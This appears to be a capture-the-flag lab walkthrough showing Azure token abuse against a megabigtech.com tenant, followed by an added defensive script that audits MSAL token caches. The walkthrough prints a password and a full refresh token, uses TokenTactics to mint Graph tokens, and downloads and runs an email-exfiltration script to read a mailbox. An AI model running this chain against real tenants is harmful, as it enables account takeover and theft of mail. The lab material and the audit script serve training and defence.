TokenTactics


Windows

As a first step, we logged in to the Azure portal and identified the resources we have access to.

Credentials: lindsey.miller@megabigtech.com:SUmmer07!!!

nc -nv 13.68.147.240 22

ssh lindsey@13.68.147.248

id

cd ~/.azure

cat msal_token_cache.json

Invoke-RefreshToMSGraphToken -domain megabigtech.com 1.AU4A78yQJX1oO0mujUQcurY6cpV3sATbjRpGu-4C-eG_e0YOAR5OAA.AgABAwEAAABVrSpeuWamRam2jAF1XRQEAwDs_wUA9P-nS4_D4HOmI7Ihh3jTU6KqE_jiUDwHfJII3ewdwwu3mUH8Hd54QrIbB3AQsEd64oAm4IpHWecNHSaD73aQfU2RKpFMnR7zooBo-7cwibEIZyJrw_F25Mdj4e0hIdptzvflkRls1cM0HnHTOZG3Lw3kEI9YoG3dzLsc9T7f208K7394cWfQaTQNvfXIFajQPd9zABwU4SY3t9CrcZO8Tp9mv4kf4CzanoT1E3UR7ecHczw_0I7vW9ghCCPYUxIZHB9PsGFyiPlC06Jo-1EYlu4OiFE_6atNvDqyLeT4M1aHSpm4DmtEqiLapgcjyI8D6VvAK8ZtJUPRLe1tkCBbSOC0WMC3PPCdEvtFIw_dcencF0UxwzAL1kYWNL6d86J_fhQ0Z8tWdR8iJpZGfQ7vqNaXmlJ3iTF7AZSQa2m-Pyvo-VEDDZHCge4rLdcM7Hm3j6lu2-OqIk6AoDqyQgHVtIp1GCWIbcUXCwC-fH4BwIVWyAEN2DSIBYCsTtBxoCj_J7dbiCoAWq8YUQPVmgt_6iH892sEP3Am5cCDAepx4Fj2eeYybg2fUaBHoikjLA1kgzTl6ysUrEGaah4NN21DDTJtXhJwwon2aO5M-rxEqoxHVzeUjRlh0dq5tf5E3z5vyi99MCrvPnND-dl7p5RnSRj1hbTJzWIgDlznGjhVGo2QizohvPImjxNXRl_FKvI2P3Kg7WnLEEkzN8FQ2DQF15yK0pc7LGa37SJjAWzbmZ60QK8

$MSGraphToken.access_token

We create an access_token with TokenTactics

$MSGraphToken.refresh_token

We create a refresh_token

wget https://raw.githubusercontent.com/rootsecdev/Azure-Red-Team/master/Tokens/exfil_exchange_mail.py

vim exfil_exchange_mail.py

We add the access token as the value of the token variable in exfil_exchange_mail.py

python3 ./exfil_exchange_mail.py

Now we have access to the emails and the ePhone blueprint

firefox './ePhone 16 blueprint.html'
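
The whole chain above starts from a refresh token stored in clear text in ~/.azure/msal_token_cache.json. The following audit script is an added example, not part of the original walkthrough or of TokenTactics; it reports that exposure on a host without ever printing a token. It assumes the cache uses MSAL's unencrypted JSON layout (a top-level "RefreshToken" section whose entries carry "secret", "home_account_id", "client_id" and, optionally, "family_id"); all sample values are constructed placeholders.

```python
import json
import os
import stat
import tempfile

def audit_msal_cache(path):
    """Report risky properties of an MSAL token cache; never returns a secret."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & 0o077:  # any group/other permission bit set
        findings.append(f"cache readable beyond owner (mode {mode:o})")
    with open(path, encoding="utf-8") as fh:
        cache = json.load(fh)
    # Assumed layout: {"RefreshToken": {key: {"secret": ..., "client_id": ...}}}
    for entry in cache.get("RefreshToken", {}).values():
        if not entry.get("secret"):
            continue
        who = entry.get("home_account_id", "unknown-account")
        client = entry.get("client_id", "unknown-client")
        findings.append(f"plaintext refresh token: account {who}, client {client}")
        if entry.get("family_id"):
            # Family refresh tokens are accepted for other client IDs in the
            # same family, so one cached token serves several applications.
            findings.append(f"family refresh token (family_id {entry['family_id']}): account {who}")
    return findings

def demo():
    """Audit a constructed cache (placeholder values, not real tokens)."""
    sample = {
        "RefreshToken": {
            "constructed-key": {
                "credential_type": "RefreshToken",
                "secret": "CONSTRUCTED-NOT-A-REAL-TOKEN",
                "home_account_id": "constructed-oid.constructed-tid",
                "client_id": "00000000-0000-0000-0000-000000000000",
                "family_id": "1",
            }
        }
    }
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "msal_token_cache.json")
        with open(path, "w", encoding="utf-8") as fh:
            json.dump(sample, fh)
        os.chmod(path, 0o644)
        return audit_msal_cache(path)

if __name__ == "__main__":
    print("\n".join(demo()))
```

Any finding means the account should sign out of the CLI on that host and have its sessions revoked, since the cached refresh token remains valid until then.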

© 2025 Cu3rv0x